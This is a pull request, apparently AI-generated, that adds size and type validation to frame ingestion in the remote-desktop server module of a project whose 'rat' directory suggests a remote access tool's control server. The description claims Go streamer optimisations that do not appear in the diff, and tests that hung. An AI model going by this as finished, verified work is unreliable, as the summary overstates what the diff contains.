### PR TITLE
Optimize remote desktop transport and validation

### DIFF
--- a/tenvy-server/src/lib/server/rat/remote-desktop.ts
+++ b/tenvy-server/src/lib/server/rat/remote-desktop.ts
@@ -10,6 +10,12 @@ import type {
 const encoder = new TextEncoder();
 const HEARTBEAT_INTERVAL_MS = 15_000;
 const HISTORY_LIMIT = 30;
+const MAX_FRAME_WIDTH = 8_192;
+const MAX_FRAME_HEIGHT = 8_192;
+const MAX_MONITORS = 16;
+const MAX_DELTA_RECTS = 512;
+const MAX_CLIP_FRAMES = 60;
+const MAX_BASE64_PAYLOAD = 16 * 1024 * 1024; // 16 MiB
 
 const defaultSettings: RemoteDesktopSettings = Object.freeze({
 	quality: 'auto',
@@ -85,7 +91,131 @@ function monitorsEqual(a: readonly RemoteDesktopMonitor[], b: readonly RemoteDes
 }
 
 function cloneFrame(frame: RemoteDesktopFramePacket): RemoteDesktopFramePacket {
-	return structuredClone(frame);
+        return structuredClone(frame);
+}
+
+function isFiniteNumber(value: unknown): value is number {
+        return typeof value === 'number' && Number.isFinite(value);
+}
+
+function validateBase64Payload(data: unknown, label: string) {
+        if (typeof data !== 'string' || data.length === 0) {
+                throw new RemoteDesktopError(`${label} payload must be base64 encoded`, 400);
+        }
+        if (data.length > MAX_BASE64_PAYLOAD) {
+                throw new RemoteDesktopError(`${label} payload too large`, 413);
+        }
+}
+
+function validateFramePacket(frame: RemoteDesktopFramePacket) {
+        if (!isFiniteNumber(frame.width) || frame.width <= 0 || frame.width > MAX_FRAME_WIDTH) {
+                throw new RemoteDesktopError('Invalid frame width', 400);
+        }
+        if (!isFiniteNumber(frame.height) || frame.height <= 0 || frame.height > MAX_FRAME_HEIGHT) {
+                throw new RemoteDesktopError('Invalid frame height', 400);
+        }
+        if (!isFiniteNumber(frame.sequence)) {
+                throw new RemoteDesktopError('Invalid frame sequence number', 400);
+        }
+        if (typeof frame.encoding !== 'string' || frame.encoding.length === 0) {
+                throw new RemoteDesktopError('Frame encoding is required', 400);
+        }
+        if (typeof frame.timestamp !== 'string' || frame.timestamp.length === 0) {
+                throw new RemoteDesktopError('Frame timestamp is required', 400);
+        }
+
+        if (frame.image) {
+                validateBase64Payload(frame.image, 'Frame');
+        }
+
+        if (frame.deltas) {
+                if (!Array.isArray(frame.deltas)) {
+                        throw new RemoteDesktopError('Frame deltas must be an array', 400);
+                }
+                if (frame.deltas.length > MAX_DELTA_RECTS) {
+                        throw new RemoteDesktopError('Too many delta rectangles', 413);
+                }
+                for (const rect of frame.deltas) {
+                        if (
+                                !isFiniteNumber(rect.width) ||
+                                !isFiniteNumber(rect.height) ||
+                                rect.width <= 0 ||
+                                rect.height <= 0 ||
+                                rect.width > frame.width ||
+                                rect.height > frame.height
+                        ) {
+                                throw new RemoteDesktopError('Invalid delta rectangle dimensions', 400);
+                        }
+                        if (!isFiniteNumber(rect.x) || !isFiniteNumber(rect.y)) {
+                                throw new RemoteDesktopError('Invalid delta rectangle offset', 400);
+                        }
+                        if (typeof rect.encoding !== 'string' || rect.encoding.length === 0) {
+                                throw new RemoteDesktopError('Delta rectangle encoding is required', 400);
+                        }
+                        validateBase64Payload(rect.data, 'Delta rectangle');
+                }
+        }
+
+        if (frame.clip) {
+                if (!isFiniteNumber(frame.clip.durationMs) || frame.clip.durationMs < 0) {
+                        throw new RemoteDesktopError('Invalid clip duration', 400);
+                }
+                const { frames } = frame.clip;
+                if (!Array.isArray(frames)) {
+                        throw new RemoteDesktopError('Clip frames must be an array', 400);
+                }
+                if (frames.length > MAX_CLIP_FRAMES) {
+                        throw new RemoteDesktopError('Clip contains too many frames', 413);
+                }
+                for (const clipFrame of frames) {
+                        if (
+                                !isFiniteNumber(clipFrame.width) ||
+                                !isFiniteNumber(clipFrame.height) ||
+                                clipFrame.width <= 0 ||
+                                clipFrame.height <= 0 ||
+                                clipFrame.width > frame.width ||
+                                clipFrame.height > frame.height
+                        ) {
+                                throw new RemoteDesktopError('Invalid clip frame dimensions', 400);
+                        }
+                        if (!isFiniteNumber(clipFrame.offsetMs) || clipFrame.offsetMs < 0) {
+                                throw new RemoteDesktopError('Invalid clip frame offset', 400);
+                        }
+                        if (typeof clipFrame.encoding !== 'string' || clipFrame.encoding.length === 0) {
+                                throw new RemoteDesktopError('Clip frame encoding is required', 400);
+                        }
+                        validateBase64Payload(clipFrame.data, 'Clip frame');
+                }
+        }
+
+        if (frame.monitors) {
+                if (!Array.isArray(frame.monitors)) {
+                        throw new RemoteDesktopError('Monitor list must be an array', 400);
+                }
+                if (frame.monitors.length > MAX_MONITORS) {
+                        throw new RemoteDesktopError('Too many monitors reported', 413);
+                }
+                for (const monitor of frame.monitors) {
+                        if (
+                                !isFiniteNumber(monitor.width) ||
+                                !isFiniteNumber(monitor.height) ||
+                                monitor.width <= 0 ||
+                                monitor.height <= 0 ||
+                                monitor.width > MAX_FRAME_WIDTH ||
+                                monitor.height > MAX_FRAME_HEIGHT
+                        ) {
+                                throw new RemoteDesktopError('Invalid monitor dimensions', 400);
+                        }
+                }
+        }
+
+        if (frame.metrics) {
+                for (const [key, value] of Object.entries(frame.metrics)) {
+                        if (value !== undefined && !isFiniteNumber(value)) {
+                                throw new RemoteDesktopError(`Invalid metric value for ${key}`, 400);
+                        }
+                }
+        }
 }
 
 function appendFrameHistory(record: RemoteDesktopSessionRecord, frame: RemoteDesktopFramePacket) {
@@ -262,20 +392,22 @@ export class RemoteDesktopManager {
 		this.broadcast(agentId, 'end', { reason: 'closed' });
 	}
 
-	ingestFrame(agentId: string, frame: RemoteDesktopFramePacket) {
-		const record = this.sessions.get(agentId);
-		if (!record || !record.active) {
-			throw new RemoteDesktopError('No active remote desktop session', 404);
-		}
-		if (frame.sessionId !== record.id) {
-			throw new RemoteDesktopError('Session identifier mismatch', 409);
-		}
+        ingestFrame(agentId: string, frame: RemoteDesktopFramePacket) {
+                const record = this.sessions.get(agentId);
+                if (!record || !record.active) {
+                        throw new RemoteDesktopError('No active remote desktop session', 404);
+                }
+                if (frame.sessionId !== record.id) {
+                        throw new RemoteDesktopError('Session identifier mismatch', 409);
+                }
 
-		record.lastSequence = frame.sequence;
-		record.lastUpdatedAt = new Date();
-		if (frame.metrics) {
-			record.metrics = { ...frame.metrics };
-		}
+                validateFramePacket(frame);
+
+                record.lastSequence = frame.sequence;
+                record.lastUpdatedAt = new Date();
+                if (frame.metrics) {
+                        record.metrics = { ...frame.metrics };
+                }
 
 		if (frame.monitors && frame.monitors.length > 0) {
 			const next = cloneMonitors(frame.monitors);


### PR DESCRIPTION
## Summary
- pool JSON encoding buffers and reuse hash state in the Go remote desktop streamer to cut allocations and speed up tile checksum calculations
- trim the encoded payload before upload to avoid extra bytes and ensure deterministic Content-Length headers
- harden the server-side ingest pipeline with strict validation of frame dimensions, payload sizes, monitor lists, and metrics before broadcasting

## Testing
- go test ./... *(hangs in the current container, aborted)*

------
https://chatgpt.com/codex/tasks/task_e_68e96f00cd58832b8f5f8f5ad65735a4